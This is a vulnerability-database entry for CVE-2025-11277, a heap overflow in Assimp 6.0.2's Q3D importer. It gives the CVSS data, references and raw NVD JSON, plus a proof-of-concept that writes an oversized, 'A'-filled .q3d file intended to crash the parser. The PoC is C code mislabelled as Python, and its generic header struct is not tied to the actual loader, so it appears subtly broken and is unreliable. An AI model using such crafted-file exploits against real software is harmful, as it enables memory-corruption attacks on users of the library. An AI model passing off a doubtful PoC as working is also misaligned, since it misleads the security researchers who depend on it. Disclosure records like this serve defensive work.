CVE-2025-11277

Description

A weakness has been identified in Open Asset Import Library Assimp 6.0.2. This affects the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. Executing a manipulation can lead to heap-based buffer overflow. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:* - VULNERABLE

Open Asset Import Library (Assimp) 6.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-11277 - Assimp Q3DLoader Heap-based Buffer Overflow PoC
// This PoC demonstrates the vulnerability in Q3DImporter::InternReadFile
// The malicious Q3D file is crafted to trigger heap buffer overflow
// during parsing of Q3D format data.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Q3D file format header structure
typedef struct {
    char magic[4];       // File magic bytes "q3D\0"
    uint32_t version;    // Format version
    uint32_t num_meshes; // Number of meshes
    uint32_t data_size;  // Size of mesh data (overly large value triggers overflow)
} Q3DHeader;

// Function to generate malicious Q3D file
int generate_poc(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to create PoC file");
        return -1;
    }

    // Write Q3D header with normal magic and version
    Q3DHeader header;
    memcpy(header.magic, "q3D\0", 4);
    header.version = 1;
    header.num_meshes = 1;

    // Set data_size to an abnormally large value to trigger heap buffer overflow
    // The parser allocates a buffer based on this size but the actual data
    // written exceeds the allocated heap memory region
    header.data_size = 0xFFFFFF;

    fwrite(&header, sizeof(Q3DHeader), 1, fp);

    // Write malicious payload data that exceeds expected buffer size
    // This data will overflow the heap buffer allocated by InternReadFile
    uint8_t payload[4096];
    memset(payload, 'A', sizeof(payload));

    // Write multiple chunks of overflow data
    for (int i = 0; i < 256; i++) {
        fwrite(payload, 1, sizeof(payload), fp);
    }

    fclose(fp);
    printf("[+] Malicious Q3D file generated: %s\n", filename);
    printf("[+] Use Assimp to open this file to trigger CVE-2025-11277\n");
    return 0;
}

int main(int argc, char* argv[]) {
    const char* output_file = (argc > 1) ? argv[1] : "poc.q3d";
    return generate_poc(output_file);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11277
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11277
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11277/
[4] VulDB https://vuldb.com/cve/CVE-2025-11277
[5] https://github.com/assimp/assimp/issues/6358
[6] https://github.com/user-attachments/files/22422643/poc.zip
[7] https://vuldb.com/?ctiid.327011
[8] https://vuldb.com/?id.327011
[9] https://vuldb.com/?submit.658912

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11277", "sourceIdentifier": "[email protected]", "published": "2025-10-05T02:15:37.470", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Open Asset Import Library Assimp 6.0.2. This affects the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. Executing a manipulation can lead to heap-based buffer overflow. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "B5BC643B-B249-45CC-A377-45E37EB62AEA"}]}]}], "references": [{"url": "https://github.com/assimp/assimp/issues/6358", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/user-attachments/files/22422643/poc.zip", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.327011", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327011", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.658912", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}